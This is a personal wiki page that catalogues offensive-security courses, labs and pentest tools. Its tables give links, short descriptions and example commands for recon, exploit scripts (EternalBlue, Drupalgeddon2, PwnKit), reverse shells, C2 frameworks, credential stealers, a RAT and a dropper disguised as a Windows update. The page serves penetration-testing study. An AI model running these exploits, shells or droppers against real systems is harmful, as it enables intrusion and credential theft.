SecurityTools
From Wiki Aghanim
Certification/Courses/Platforms/Knowledge/labs
| Name | Description | Link | Tag |
|---|---|---|---|
| CARTP | Certified Azure Red Teaming Professional | Attacking & Defending Azure Cloud: Beginner's Edition (CARTP) (alteredsecurity.com) | Certification |
| Root me | Welcome [Root Me : Hacking and Information Security learning platform (root-me.org)] | Platform | |
| PentesterLab | PentesterLab: Learn Web Penetration Testing: The Right Way | Platform | |
| CRTS | Red Team Specialist [CRTS - CWL : Advanced Cyber Attack & Detection Learning Platform (cyberwarfare.live)] | Certification | |
| VX-Underground | https://www.vx-underground.org/ | Knowledge collection | |
| Maldev Academy | Maldev Academy | Certification | |
| Zero-Point Security | Red Team Ops II, Red Team Ops I, C2 Development C#... | Zero-Point Security (zeropointsecurity.co.uk) | Courses |
| Fucking the book of secret knowledge | Correia-jpv/fucking-the-book-of-secret-knowledge: A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more. With repository stars⭐ and forks🍴 (github.com) | Knowledge collection | |
| Red Team Labs | Altered Security] | Certification | |
| HTB CPTS | Hack The Box] | Certification | |
| Game Of Thrones Active Directory | Self-hosted vulnerable AD lab. | Orange-Cyberdefense/GOAD: game of active directory (github.com) | Lab |
| Pentesteracademy | All Courses - Full Listing (pentesteracademy.com) | Courses | |
| Breadev Academy | EvilNginx (Phishing course) | https://academy.breakdev.org/ | Course |
| Rhino Security Labs | RhinoSecurityLabs/cloudgoat: CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool (github.com) | Lab | |
| Awesome EDR Bypass | List of PoC, blogs, tools etc | tkmru/awesome-edr-bypass: Awesome EDR Bypass Resources For Ethical Hacking (github.com) | Knowledge |
| Awesome AV-EDR-XDR Bypass | How to bypass different AV vendors | MrEmpy/Awesome-AV-EDR-XDR-Bypass: Awesome AV/EDR/XDR Bypass Tips (github.com) | Knowledge |
| Binary Offensive | Mgeeky. Initial Access Training | Offensive IT Security] | Courses |
| Sektor7 | Malware dev, windows evasion etc | SEKTOR7 Research | Course |
| Hacktricks Learning and Certs | Cloud Certs | HackTricks Training | Course/Certification |
| BallisKit | Initial Access Training and tool | BallisKit | Course/knowledge |
| Attacking and Defending Azure AD Cloud: Beginner's Edition | Cloud Cert | Attacking & Defending Azure Cloud: Beginner's Edition (CARTP) (alteredsecurity.com) | Certification |
| The Art Of Initial Access | This course is for learning to create macro in VBA to gain inital access | MacroPioneer: The Art of Initial Access - Advanced Macro Techniques Series (redteamtacticsacademy.com) | Course |
| Cyberwarfare | Certified Red Team Analyst (CRTA) | CyberWarFare Labs – Learn Cyber Security | Certification |
| Offensive Development and Tradecraft | Learn advanced skills of Red Team Operators and Offensive Developers | Offensive Development and Tradecraft – Ask Academy Live | Certification |
Unsorted tools
| Name of the Tool | Link | Description | Command Example | Tool Category |
|---|---|---|---|---|
| JAWS - Just Another Windows (Enum) Script | GitHub Link | JAWS is a Windows enumeration script. | N/A | Enumeration/Info Gathering |
| ProxyNotShell-PoC | GitHub Link | ProxyNotShell-PoC is a proof of concept tool. | N/A | Exploitation |
| MSSQL Practical Injection Cheat Sheet - Perspective Risk | Link | A practical cheat sheet for MSSQL injection. | N/A | Web Application |
| Pycrypt (Pycrypt) | GitHub Link | Pycrypt is a tool related to cryptography in Python. | N/A | Encryption/Decryption |
| Cython: C-Extensions for Python | Link | Cython is a tool for creating C-extensions for Python. | N/A | Development Tools |
| ZoomEye | Link | ZoomEye is a cyberspace mapping tool. | N/A | Enumeration/Info Gathering |
| ICMP Reverse Shell written in Python 3 (icmpdoor) | GitHub Link | icmpdoor is an ICMP reverse shell written in Python 3. | N/A | Post-Exploitation |
| ICMP reverse shell in Python 3 (Cryptsus Blog) | Link | Information on using an ICMP reverse shell in Python 3. | N/A | Post-Exploitation |
| You got Domain Admin, now what? | Link | An article discussing actions to take after gaining Domain Admin access. | N/A | Post-Exploitation |
| How to bypass sudo — exploit cve-2023–22809 vulnerability | Link | A guide on bypassing sudo using a CVE-2023-22809 vulnerability. | N/A | Privilege Escalation |
| fireprox: AWS API Gateway management tool | GitHub Link | fireprox is a tool for creating HTTP pass-through proxies for IP rotation using AWS API Gateway. | N/A | Web Application |
| OfflineSAM/OfflineAddAdmin2 | GitHub Link | OfflineSAM/OfflineAddAdmin2 is a tool for adding admin accounts offline in Windows. | N/A | Privilege Escalation |
| Falcon Sandbox | Link | Falcon Sandbox is a malware analysis service. | N/A | Malware Analysis |
| Inveigh: .NET IPv4/IPv6 machine-in-the-middle tool | GitHub Link | Inveigh is a tool for intercepting traffic and performing man-in-the-middle attacks on IPv4/IPv6 networks. | N/A | Exploitation |
| Pentesting CI/CD Methodology | Link | A methodology for penetration testing in CI/CD environments. | N/A | Penetration Testing |
| Sn1per: Attack Surface Management Platform | GitHub Link | Sn1per is an attack surface management platform. | N/A | Penetration Testing |
| SignatureGate: Weaponized HellsGate/SigFlip | GitHub Link | SignatureGate is a tool related to weaponized HellsGate/SigFlip. | N/A | Exploitation |
| Synergy-httpx: Python HTTP server for red teaming activities | GitHub Link | Synergy-httpx is a Python HTTP server designed for red teaming activities. | N/A | Web Application |
| RosFuscator: C# source code obfuscation project | GitHub Link | RosFuscator is a project for obfuscating C# source code using Roslyn. | N/A | Exploitation |
| Havoc | N/A | No link or description provided. | N/A | N/A |
| atomic-red-team: Detection tests based on MITRE's ATT&CK | GitHub Link | atomic-red-team provides detection tests based on MITRE's ATT&CK framework. | N/A | Enumeration/Info Gathering |
| ChainBrain AI: Advanced Prompts for ChatGPT | Link | ChainBrain AI is a tool for providing advanced prompts to ChatGPT. | N/A | N/A |
| Villain: C2 framework for reverse shells | GitHub Link | Villain is a C2 framework for handling multiple TCP socket and HoaxShell-based reverse shells. | N/A | Exploitation |
| Wormhole: Private file sharing | Link | Wormhole is a private file sharing tool. | N/A | N/A |
| PowershellKerberos: dumper.ps1 | GitHub Link | PowershellKerberos provides a dumper.ps1 script. | N/A | Enumeration/Info Gathering |
| pyFUD: Cross-platform remote access Trojan (RAT) | GitHub Link | pyFUD is a cross-platform remote access Trojan (RAT). | N/A | Malware |
| Caido: Lightweight web security auditing toolkit | N/A | No link provided. | N/A | N/A |
| OSINT Industries | Link | OSINT Industries provides OSINT tools and resources. | N/A | Enumeration/Info Gathering |
| IPVoid: IP address and network tools | Link | IPVoid offers IP address and network tools. | N/A | Enumeration/Info Gathering |
| LOTS Project: Living Off Trusted Sites | N/A | No link or description provided. | N/A | N/A |
| Penetration-Testing-Tools: Collection of tools and scripts | GitHub Link | A collection of tools, scripts, and cheatsheets for red teaming, penetration testing, and IT security audits. | N/A | Penetration Testing |
| XSStrike: Advanced XSS scanner | GitHub Link | XSStrike is an advanced XSS scanner. | N/A | Web Application |
| PetitPotam: PoC tool for Windows authentication | GitHub Link | PetitPotam is a proof of concept tool to coerce Windows hosts to authenticate to other machines. | N/A | Exploitation |
| Snaffler: Tool for finding candy | GitHub Link | Snaffler is a tool for pentesters to find valuable information. | N/A | Enumeration/Info Gathering |
| LaZagne: Credentials recovery project | GitHub Link | LaZagne is a credentials recovery project. | N/A | Password Cracking |
| rdpwrap: RDP Wrapper Library | GitHub Link | rdpwrap is an RDP Wrapper Library. | N/A | Privilege Escalation |
| iKAT: Interactive Kiosk Attack Tool | Link | iKAT is an interactive kiosk attack tool. | N/A | Exploitation |
| RdpThief: Extracting Clear Text Passwords from mstsc.exe | GitHub Link | RdpThief extracts clear text passwords from mstsc.exe using API hooking. | N/A | Password Cracking |
| Snusbase: Database Search Engine | Link | Snusbase is a database search engine. | N/A | Enumeration/Info Gathering |
| attacking-cloudgoat2: Walkthrough of CloudGoat 2.0 scenarios | GitHub Link | A step-by-step walkthrough of CloudGoat 2.0 scenarios. | N/A | Penetration Testing |
| ligolo-ng: Tunneling and pivoting tool | GitHub Link | ligolo-ng is a tunneling and pivoting tool that uses a TUN interface. | N/A | Exploitation |
| PowerAL: PowerShell module for identifying AppLocker weaknesses | GitHub Link | PowerAL is a PowerShell module for identifying AppLocker weaknesses. | N/A | Privilege Escalation |
| prettyRECON | N/A | No link or description provided. | N/A | N/A |
| ExtractBitlockerKeys: Script to extract Bitlocker recovery keys | GitHub Link | A script to automatically extract Bitlocker recovery keys from a domain. | N/A | Post-Exploitation |
| Microsoft-Activation-Scripts: Windows and Office activator | GitHub Link | A Windows and Office activator using HWID / KMS38 / Online KMS activation methods, with a focus on open-source code and fewer antivirus detections. | N/A | Exploitation |
| NetExec: The Network Execution Tool | GitHub Link | NetExec is a network execution tool. | N/A | Exploitation |
| naabu: Fast port scanner for attack surface discovery | GitHub Link | naabu is a fast port scanner designed for attack surface discovery in bug bounties and pentests. | N/A | Enumeration/Info Gathering |
| DavRelayUp: Local privilege escalation tool | GitHub Link | DavRelayUp is a tool for local privilege escalation in domain-joined Windows workstations where LDAP signing is not enforced. | N/A | Privilege Escalation |
| AD_Miner: Active Directory audit tool | GitHub Link | AD_Miner is an Active Directory audit tool that leverages Cypher queries to analyze data from the Bloodhound graph database and uncover security weaknesses. | N/A | Enumeration/Info Gathering |
| Perfusion: Exploit for RpcEptMapper registry key vulnerability | GitHub Link | Perfusion is an exploit for the RpcEptMapper registry key permissions vulnerability in Windows. | N/A | Exploitation |
| MSSqlPwner: Microsoft SQL Server exploitation tool | GitHub Link | MSSqlPwner is a tool for exploiting Microsoft SQL Server. | N/A | Exploitation |
| HeidiSQL: Database management tool | Link | HeidiSQL is a database management tool for MariaDB, MySQL, MSSQL, PostgreSQL, and SQLite. | N/A | Database Management |
| Apollo 11 Guidance Computer (AGC) Source Code | GitHub Link | Original source code for the Apollo 11 Guidance Computer (AGC) used in the command and lunar modules. | N/A | Software Development |
| index-of.co.uk | Website Link | A website providing links to various files and resources. | N/A | Enumeration/Info Gathering |
| Top Pentest Devices | N/A | No link or description provided. | N/A | N/A |
| Wolfram | Alpha: Computational Intelligence | Link | Wolfram | Alpha is a computational intelligence engine that provides answers to a wide range of queries. |
| tomcatWarDeployer: Apache Tomcat auto WAR deployment tool | GitHub Link | tomcatWarDeployer is a tool for automatically deploying WAR files to Apache Tomcat servers during penetration testing. | N/A | Exploitation |
| nmapAutomator: Background script for Nmap | GitHub Link | nmapAutomator is a script designed to run Nmap in the background and automate the process of port scanning and service enumeration. | N/A | Enumeration/Info Gathering |
| kerbrute: Kerberos bruteforcing script | GitHub Link | kerbrute is a script for performing Kerberos bruteforcing using Impacket library. | N/A | Password Cracking |
| kerbrute: Tool for Kerberos pre-auth bruteforcing | GitHub Link | kerbrute is a tool for performing Kerberos pre-authentication bruteforcing. | N/A | Password Cracking |
| attacktive-directory-tools: Tools for Active Directory | GitHub Link | attacktive-directory-tools is a collection of tools for Active Directory attacks and enumeration. | N/A | Enumeration/Info Gathering |
| pywerview: Python rewriting of PowerView | GitHub Link | pywerview is a Python rewrite of PowerSploit's PowerView, a tool for Active Directory enumeration. | N/A | Enumeration/Info Gathering |
| evil-winrm: WinRM shell for hacking/pentesting | GitHub Link | evil-winrm is a tool for interacting with Windows Remote Management (WinRM) for hacking and penetration testing. | N/A | Exploitation |
| sqlmap: SQL injection and database takeover tool | GitHub Link | sqlmap is an automated SQL injection and database takeover tool. | N/A | Web Application |
| crunch: Wordlist generator | GitHub Link | crunch is a wordlist generator that allows you to specify a standard character set for generating password lists. | N/A | Password Cracking |
| wfuzz: Web application fuzzer | GitHub Link | wfuzz is a web application fuzzer that helps in discovering vulnerabilities through automated testing. | N/A | Web Application |
| OWASP CheatSheetSeries: Application security cheat sheets | GitHub Link | The OWASP Cheat Sheet Series provides a collection of high-value information on specific application security topics. | N/A | Security Reference |
| ncsc-scanning-made-easy-script-developer-guidelines.md | GitHub Link | Developer guidelines for creating scanning scripts as part of the UK NCSC Scanning Made Easy project. | N/A | Security Guidelines |
| pspy: Linux process monitoring without root permissions | GitHub Link | pspy is a tool for monitoring Linux processes without requiring root permissions. | N/A | Enumeration/Info Gathering |
| Churrasco: Changes for Visual Studio 2013 | GitHub Link | Churrasco contains changes for Visual Studio 2013. | N/A | Development Tools |
| MS10-059: Chimichurri Windows kernel exploit | GitHub Link | MS10-059 is a Windows kernel exploit known as Chimichurri. | N/A | Exploitation |
| CVE-2021-4034: 1-day vulnerability | GitHub Link | CVE-2021-4034 is a one-day vulnerability. | N/A | Exploitation |
| unicorn: PowerShell downgrade attack and shellcode injector | GitHub Link | unicorn is a tool for using a PowerShell downgrade attack and injecting shellcode into memory. | N/A | Exploitation |
| dostackbufferoverflowgood | GitHub Link | dostackbufferoverflowgood is a resource for learning about stack buffer overflows. | N/A | Exploitation |
| Obfuscated String/Shellcode Generator - Online Tool | Website Link | An online tool for generating obfuscated strings and shellcode. | N/A | Exploitation |
| explodingcan: Implementation of NSA's ExplodingCan exploit | GitHub Link | explodingcan is an implementation of NSA's ExplodingCan exploit in Python. | N/A | Exploitation |
| winPEAS: Privilege Escalation for Windows | GitHub Link | winPEAS is a |
Information Gathering/ Enumeration
| Tool/Technique | Link | Description | Command/Example |
|---|---|---|---|
| NMAP - Network Mapper | Nmap Network Scanning]Firewall/IDS Evasion and Spoofing | Nmap Network Scanning | Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. | nmap -sC -sV -p- --min-rate 10000 <target-ip> -oN output |
| Batea | https://github.com/delvelabs/batea | The goal of Batea is to allow security teams to automatically filter interesting network assets in large networks using nmap scan reports. | # Complete info $ sudo nmap -A 192.168.0.0/16 -oX output.xml # Partial info $ sudo nmap -O -sV 192.168.0.0/16 -oX output.xml $ batea -v output.xml |
| Binwalk | https://github.com/ReFirmLabs/binwalk | Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images. | # Extract any file that it finds binwalk -e firmware.bin |
| Blackeye | https://github.com/An0nUD4Y/blackeyehttps://www.geeksforgeeks.org/blackeye-phishing-tool-in-kali-linux/ | Create phishing webistes to phish information. | https://www.geeksforgeeks.org/blackeye-phishing-tool-in-kali-linux/ |
| Censys | https://censys.io/ | Censys reduces your Internet attack surface by continually discovering unknown assets and helping remediate Internet facing risks | https://search.censys.io/ |
| Shodan | https://www.shodan.io/ | Search Engine for the Internet of Everything | apache country:no port:80 http.status:200 |
| Dig | https://www.hostinger.com/tutorials/how-to-use-the-dig-command-in-linux/ | Dig (Domain Information Groper) is a command line utility that performs DNS lookup by querying name servers and displaying the result to you. | dig [server] [name] [type] |
| DNSdumpster | https://dnsdumpster.com/ | DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. | Search for domain. |
| Enum4Linux | https://github.com/CiscoCXSecurity/enum4linux | Enum4linux is a tool for enumerating information from Windows and Samba systems | enum4linux -a host |
| EyeWitness | https://github.com/FortyNorthSecurity/EyeWitness | EyeWitness is designed to take screenshots of websites provide some server header info, and identify default credentials if known. | ./EyeWitness -f urls.txt --web |
| Insomnia | https://insomnia.rest/ | Run API queries with GUI | See website |
| Masscan | https://github.com/robertdavidgraham/masscan | This is an Internet-scale port scanner. It can scan the entire Internet in under 5 minutes, transmitting 10 million packets per second, from a single machine. | Scans the entire intenret masscan 0.0.0.0/0 -p0-65535 |
| Maltego | https://www.maltego.com/product-features/?utm_source=paterva.com&utm_medium=referral&utm_campaign=301 | Maltego1 is a very powerful data mining tool that offers an endless combination of search tools and strategies | |
| SIPvicious suite | https://github.com/EnableSecurity/sipvicious | SIPVicious OSS is a set of security tools that can be used to audit SIP based VoIP systems. Specifically, it allows you to find SIP servers, enumerate SIP extensions and finally, crack their password. | See github for full documentation |
| Steghide | http://steghide.sourceforge.net/ | Steghide is a steganography program that is able to hide data in various kinds of image- and audio-files. | $ steghide embed -cf picture.jpg -ef secret.txt Enter passphrase: Re-Enter passphrase: embedding "secret.txt" in "picture.jpg"... done |
| ODAT - Oracle Database Attacking Tool | https://github.com/quentinhardy/odat | ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely. | See github. |
| theHarvester | https://github.com/laramies/theHarvester | The tool gathers names, emails, IPs, subdomains, and URLs | theharvester -d megacorpone.com -b googlex |
| Social searcher | https://www.social-searcher.com/ | Free Social Media Search Engine | n/a |
| Sn1per | https://github.com/1N3/Sn1per | Discover hidden assets and vulnerabilities in your environment | See github |
| gitleaks | GitHub - gitleaks/gitleaks: Protect and discover secrets using Gitleaks 🔑 | Gitleaks is a SAST tool for detecting and preventing hardcoded secrets like passwords, api keys, and tokens in git repos. | gitleaks detect --source . -v |
| AutoRecon | GitHub - Tib3rius/AutoRecon: AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. | Automatic enumeration | autorecon -t target |
Exploitation
| Tool | Link | Description | Command/Example |
|---|---|---|---|
| MS17-010 | https://github.com/helviojunior/MS17-010https://github.com/worawit/MS17-010 | Repository for EternalBlue exploit. | See repository. |
| MS10-059 | https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri | ||
| Infectious Monkey | https://www.guardicore.com/infectionmonkey/ | Infection Monkey is a free open-source, network penetration testing tool. It is a breach and attack simulator that uses real-world attack techniques and known vulnerabilities. | https://woodward.digital/infection-monkey-network-penetration-testing/?v=c2f3f489a005 |
| Metsploit | https://www.offensive-security.com/metasploit-unleashed/exploits/ | Exploit vulnerabilites automatically. | msfconsole |
| Windows-php-reverse-shell | https://github.com/Dhayalanb/windows-php-reverse-shell | Simple php reverse shell implemented using binary , based on an webshell . | Usage : change the ip and port in the windows-php-reverse-shell.php file upload , set up an listener in you machine , access the windows-php-reverse-shell.php file on the server |
| SQLmap | https://github.com/sqlmapproject/sqlmap | sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. | To get a list of basic options and switches use:python sqlmap.py -h |
| IIS 6.0 BOF - RCE | https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269 | CVE-2017-7269 - Buffer Overflow in the ScStoragePathFromUrl function in webdav | python2 exploit.py targetip targetport srcip srcport |
| Drupalgeddon2 | https://github.com/dreadlocked/Drupalgeddon2 | Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002 | ruby drupalgeddon2.rb TARGET |
| Windows Kernel Exploit List | https://github.com/SecWiki/windows-kernel-exploits | List of Kernel exploits | See github |
Password Crackers
| Tool | Link | Description | Command/Example |
|---|---|---|---|
| Hashcat | https://hashcat.net/hashcat/ | Hashcat is a password cracking tool. | See CheatSheet |
| Hydra | https://github.com/vanhauser-thc/thc-hydra | This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. | See CheatSheet |
Privilege Escalation
| Tool | Link | OS | Description | Command/Example |
|---|---|---|---|---|
| BeRoot Project | https://github.com/AlessandroZ/BeRoot | Windows/Linux | BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. | usage: beRoot.exe [-h] [-l]python beroot.py |
| Deepce | https://github.com/stealthcopter/deepce | N/A | Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE) | # Make the script executable and then run it chmod +x ./deepce.sh ./deepce.sh |
| GTFObins | https://gtfobins.github.io/ | UNIX | GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. | See website. |
| LinEnum | https://github.com/rebootuser/LinEnum | Linux | List possible PrivEsc Vectors | See github |
| linPEAS | https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS | Linux | List possbile privesc vectors | ./linpeas.sh |
| winPEAS | https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS | Windows | List possible privesc vectors | winpeas.exe or winpeas.bat |
| linuxprivchecker | https://github.com/linted/linuxprivchecker | Linux | List possible privesc vectors | https://github.com/linted/linuxprivchecker/blob/master/linuxprivchecker.py |
| linux-exploit-suggester | https://github.com/mzet-/linux-exploit-suggester | Linux | List possible privesc vectors. Run locally | ./linux-exploit-suggester.sh |
| windows-exploit-suggester | https://github.com/AonCyberLabs/Windows-Exploit-Suggester | Windows | List posbile privesc vectors. Run locally | ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt |
| PowerSploit\PowerUp.ps1 | https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc | Windows | PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. | See full potentional i github. To execute on target, see my cheatsheet. |
| PowerSploit\PowerView.ps1 | https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 | Windows | PowerView is series of functions that performs network and Windows domain enumeration and exploitation. | See full potentional i github. To execute on target, see my cheatsheet. |
| Juicy Potato | https://github.com/ohpe/juicy-potato | RottenPotatoNG and its variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges. | ||
| MS10-059 Chimichurri | https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri | Windows | Vulnerabilities in the Tracing Feature for Services Could Allow an Elevation of Privilege (982799) | chimichurri.exe attackerip attackerport |
| Polkit CVE-2021-4034 | https://github.com/joeammond/CVE-2021-4034 | Linux | polkit's pkexec, a SUID-root program that is installed by default on every major Linux distribution: | python3 cve-2021-4034.py (run it on target to get root. |
Post-Exploitation
| Tool | Link | Description | Command/Example |
|---|---|---|---|
| C2 - Covenant | https://github.com/cobbr/Covenant | Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers. | https://github.com/cobbr/Covenant/wiki/Installation-And-Startup |
| C2 - PoshC2 | https://github.com/nettitude/PoshC2 | PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement. | See github |
| C2 - Cobalt Strike | https://www.cobaltstrike.com/ | Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer’s network. | https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/post-exploitation_main.htm?cshid=1085 |
| C2 - Empire | https://github.com/EmpireProject/Empire | Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent | http://www.powershellempire.com/?page_id=83 |
| C2 - Starkiller (Empire frontend) | https://github.com/BC-SECURITY/Starkiller | Starkiller is a Frontend for Powershell Empire. | ./starkiller-<version>.AppImage --no-sandbox |
| C2 - Meterpreter | https://github.com/r00t-3xp10it/meterpeter | Linux attacker machine and generates oneliner PS reverse shell payloads obfuscated in BXOR with a random secret key and another layer of Characters/Variables Obfuscation to be executed on the victim machine | Deliver Dropper/Payload To Target Machine (apache2)USE THE 'Attack Vector URL' TO DELIVER 'Update-KB4524147.zip' (dropper) TO TARGET .. UNZIP (IN DESKTOP) AND EXECUTE 'Update-KB4524147.bat' (Run As Administrator).. |
| C2 - Alan Framework | https://github.com/enkomio/AlanFramework | Alan Framework is a post-exploitation framework useful during red-team activities. | https://www.youtube.com/watch?v=dgEBEAfEseY |
| C2 - Silver | https://github.com/BishopFox/sliver | Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. | sudo bash and then run sliverhttps://github.com/BishopFox/sliver#help |
| Armitage | https://www.offensive-security.com/metasploit-unleashed/armitage/ | Armitage is a Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit. | https://www.offensive-security.com/metasploit-unleashed/armitage-exploitation/ |
| Chisel | https://github.com/jpillora/chisel | Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. | $ chisel server --port $PORT --proxy http://example.com # listens on $PORT, proxy web requests to http://example.com |
| sshuttle | https://github.com/sshuttle/sshuttle#sshuttle-where-transparent-proxy-meets-vpn-meets-ssh | sshuttle allows you to create a VPN connection from your machine to any remote server that you can connect to via ssh | sshuttle [options] -r [username@]sshserver[:port] <subnets …> |
| lingolo-ng | https://github.com/tnpitsecurity/ligolo-ng | Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS). | See github |
| C2 - Havoc | Havoc (havocframework.com)GitHub - HavocFramework/Havoc: The Havoc Framework. | Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.New C2 framework that can bypass Win 11 defender | See github |
| C2 - Brute ratel | Badger doesn’t care. It takes what it wants!] | A Customized Command and Control Center for Red Team and Adversary Simulation |
Web Application
| Tool | Link | Description | Command/Example |
|---|---|---|---|
| BurpSuite | https://portswigger.net/burp | Burp Suite is a framework of web appliccation pentesting tool. It is used to perform web app testing. | https://blog.aghanim.net/?p=732 |
| Dirb | https://github.com/v0re/dirbhttps://www.kali.org/tools/dirb/ | DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. | dirb <url_base> <url_base> [<wordlist_file(s)>] [options] |
| Dirbpy | https://github.com/marcolivierbouch/dirbpy | This is a new version of dirb but in python. This version is faster than the normal version in C because it uses thread. Dirbpy is a Web Content Scanner. It looks for hidden Web Objects. | dirbpy -o https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt -u https://%5B....%5D.com |
| Dirhunter | https://github.com/Nekmo/dirhunt | Dirhunt is a web crawler optimize for search and analyze directories. | $ dirhunt http://website.com/ |
| ffuf | https://github.com/ffuf/ffuf | A fast web fuzzer written in Go. | ffuf -w /path/to/wordlist -u https://target/FUZZ |
| Feroxbuster | https://github.com/epi052/feroxbuster | feroxbuster is a tool designed to perform Forced Browsing. | ./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx |
| Gobuster | https://github.com/OJ/gobuster | Gobuster is a tool used to brute-force:URIs (directories and files) in web sites.DNS subdomains (with wildcard support).Virtual Host names on target web servers.Open Amazon S3 buckets | gobuster dir -u http:// -w wordlist |
| Fuxploider | https://github.com/almandin/fuxploider | This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server. | python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type" |
| FuzzDB | https://github.com/fuzzdb-project/fuzzdb | Increase the likelihood of finding application security vulnerabilities through dynamic application security testing. | https://github.com/fuzzdb-project/fuzzdb/wiki/usagehints |
| Nikto | https://github.com/sullo/nikto | Nikto is web server scanner | nikto -h <target> |
| Raccoon | https://github.com/evyatarmeged/Raccoon | Offensive Security Tool for Reconnaissance and Information Gathering | Usage: raccoon [OPTIONS] TARGET |
| Sublist3r | https://github.com/aboul3la/Sublist3r | Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. | To enumerate subdomains of specific domain:python sublist3r.py -d example.com |
| Joomscan | https://github.com/OWASP/joomscan | Automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments | joomscan.pl [options] |
| Droopscan | https://github.com/SamJoan/droopescan | Supported CMS are:SilverStripeWordpressDrupal | droopescan scan drupal -u http://example.org/ -t 32 |
| Crawleet | https://github.com/truerandom/crawleet | Web Recon & Exploitaition Tool. | python crawleet.py -u <URL> |
| wafw00f | https://github.com/EnableSecurity/wafw00f | WAF Bypass | wafw00f http://target |
Active Directory Environment
| Tool | Link | Description | Command/Example |
|---|---|---|---|
| BloodHoundAD | https://github.com/BloodHoundAD/BloodHound | BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. | https://bloodhound.readthedocs.io/en/latest/index.html |
| Impacket | https://github.com/SecureAuthCorp/impacket | Impacket is a collection of Python classes for working with network protocols. NOT LIMITED TO AD ENVIRONMENT. | https://www.secureauth.com/labs/open-source-tools/impacket/ |
| Nishang | https://github.com/samratashok/nishang | Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. NOT LIMITED TO AD ENVIRONMENT | See github |
| PowerSploit | https://github.com/PowerShellMafia/PowerSploit | PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. NOT LIMITED TO AD ENVIRONMENT | See github |
Malware Analysis(MA)/ Buffer Overflow(BOF)
| Type | Tool | Link | Description | Command/Example |
|---|---|---|---|---|
| MA | Ghidra | https://ghidra-sre.org/ | A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission | https://github.com/NationalSecurityAgency/ghidra |
| BOF | Python GDB PEDA | https://github.com/longld/peda | PEDA - Python Exploit Development Assistance for GDB | See Github |
WiFi / Wireless
| Tool | Link | Description | Command/Example |
|---|---|---|---|
| Aircrack-ng | https://www.aircrack-ng.org/ | Aircrack-ng is a complete suite of tools to assess WiFi network security.Monitoring: Packet capture and export of data to text files for further processing by third party toolsAttacking: Replay attacks, deauthentication, fake access points and others via packet injectionTesting: Checking WiFi cards and driver capabilities (capture and injection)Cracking: WEP and WPA PSK (WPA 1 and 2) | #Deatuh attackaireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0# Start airodump-ng to collect authentication handshakeairodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0 |
| BoopSuite | https://github.com/MisterBianco/BoopSuitehttps://en.kali.tools/?p=462 | BoopSuite is a set of tools written in Python designed for wireless auditing and security testing. | BoopMon [-h] [-v] [-c [CHANNEL [CHANNEL ...]]] [-k] [-n NAME] -i {} [-m MAC] |
| Kismet | https://www.kismetwireless.net/ | Kismet is a wireless network and device detector, sniffer, wardriving tool, and WIDS (wireless intrusion detection) framework. | https://github.com/kismetwireless/kismet |
